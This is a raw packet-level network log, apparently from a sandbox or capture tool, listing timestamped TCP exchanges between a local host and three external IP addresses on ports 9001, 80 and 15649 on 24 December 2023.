Dec 24, 2023 10:44:32.667428970 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.667490959 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.667536974 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.667552948 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.667589903 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.667593002 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.667629004 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.667650938 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.667687893 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.667752981 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.667798996 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.667817116 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.667855024 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.667855978 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.667892933 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.667907000 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.667939901 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.667963028 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.667995930 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.668000937 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.668040037 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.668066978 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.668100119 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.668129921 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.668162107 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.668164015 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.668201923 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.668227911 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.668270111 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.668358088 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.668399096 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.668435097 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.668469906 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.668473005 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.668507099 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.668551922 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.668587923 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.668592930 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.668638945 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.668638945 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.668657064 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.668680906 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.668704033 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.668782949 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.668823004 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.668843985 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.668879986 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.668955088 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.668997049 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.669023991 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.669064999 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.669087887 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.669126987 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.669146061 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.669173002 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.669181108 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.669210911 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.669238091 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.669279099 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.669565916 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.669655085 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.669698000 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.678471088 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.678553104 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.678733110 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.684364080 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.686908960 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.687071085 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.687151909 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.695892096 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.695941925 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.695997000 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.703572989 CET	15649	49723	212.118.39.73	192.168.2.5
Dec 24, 2023 10:44:32.703670979 CET	49723	15649	192.168.2.5	212.118.39.73
Dec 24, 2023 10:44:32.703732014 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.703764915 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.703814983 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.712157965 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.712291002 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.712368965 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.720278025 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.720356941 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.720401049 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.728497982 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.728560925 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.728620052 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.736840963 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.736887932 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.736936092 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.745217085 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.745250940 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.745333910 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.753448009 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.753515005 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.753571033 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.761686087 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.761744976 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.761792898 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.770020962 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.770083904 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.770140886 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.778317928 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.778414965 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.778487921 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.786457062 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.786623001 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.786683083 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.794709921 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.794769049 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.794817924 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.802897930 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.802975893 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.803016901 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.811261892 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.811362982 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.811417103 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.819416046 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.819504023 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.819545984 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.826966047 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.827040911 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.827085018 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.834781885 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.834830046 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.834872961 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.842394114 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.842462063 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.842508078 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.849905014 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.850011110 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.850054979 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.857312918 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.857376099 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.857429028 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.864658117 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.864712000 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.864753008 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.873661041 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.873677015 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.873729944 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.879097939 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.879157066 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.879200935 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.888318062 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.888463974 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.888513088 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.895163059 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.895426035 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.895481110 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.896678925 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.896692038 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.896739960 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.896765947 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.896821976 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.896864891 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.897021055 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.897032976 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.897042990 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.897062063 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.897069931 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.897094011 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.897202015 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.897213936 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.897242069 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.897253036 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.897380114 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.897392035 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.897403002 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.897428989 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.897444010 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.897557974 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.897569895 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.897595882 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.897619009 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.897753954 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.897766113 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.897778034 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.897789955 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.897797108 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.897800922 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.897818089 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.897850037 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.898011923 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.898024082 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.898034096 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.898058891 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.898082018 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.899074078 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.899089098 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.899123907 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.899142027 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.899252892 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.899266005 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.899292946 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.899306059 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.899435043 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.899471998 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.899616003 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.899627924 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.899637938 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.899656057 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.899676085 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.899806976 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.899821997 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.899852037 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.899862051 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.899985075 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.899996996 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.900031090 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.900043964 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.900177956 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.900188923 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.900202990 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.900224924 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.900248051 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.900295973 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.900309086 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.900319099 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.900336981 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.900350094 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.900479078 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.900490999 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.900526047 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.900537968 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.902821064 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.902837992 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.902880907 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.909055948 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.909373999 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.909424067 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.913338900 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.913386106 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.913714886 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.913762093 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.915293932 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.915339947 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.915431976 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.915443897 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.915478945 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.915524006 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.915555954 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.915568113 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.915600061 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.915611029 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.915749073 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.915760994 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.915787935 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.915797949 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.915930033 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.915941954 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.915970087 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.915981054 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.916107893 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.916119099 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.916130066 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.916146040 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.916157007 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.916176081 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.916301966 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.916312933 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.916322947 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.916337967 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.916352034 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.916364908 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.916475058 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.916486979 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.916497946 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.916516066 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.916527987 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.916548014 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.916659117 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.916670084 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.916702032 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.916727066 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.916836023 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.916847944 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.916882038 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.916893005 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.917026997 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.917037964 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.917073965 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.917085886 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.917213917 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.917226076 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.917237043 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.917259932 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.917285919 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.917330027 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.917370081 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.917530060 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.917541981 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.917552948 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.917563915 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.917574883 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.917593002 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.917622089 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.917679071 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.917691946 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.917701960 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.917715073 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.917718887 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.917726040 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.917742014 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.917742968 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.917748928 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.917754889 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.917766094 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.917769909 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.917798042 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.917803049 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.917809963 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.917820930 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.917831898 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.917834997 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.917843103 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.917855024 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.917866945 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.917866945 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.917891979 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.917892933 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.917906046 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.917907953 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.917917013 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.917927980 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.917933941 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.917939901 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.917953014 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.917954922 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.917965889 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.917978048 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.917979956 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.917990923 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.917999029 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.918003082 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.918014050 CET	9001	49721	192.121.44.26	192.168.2.5
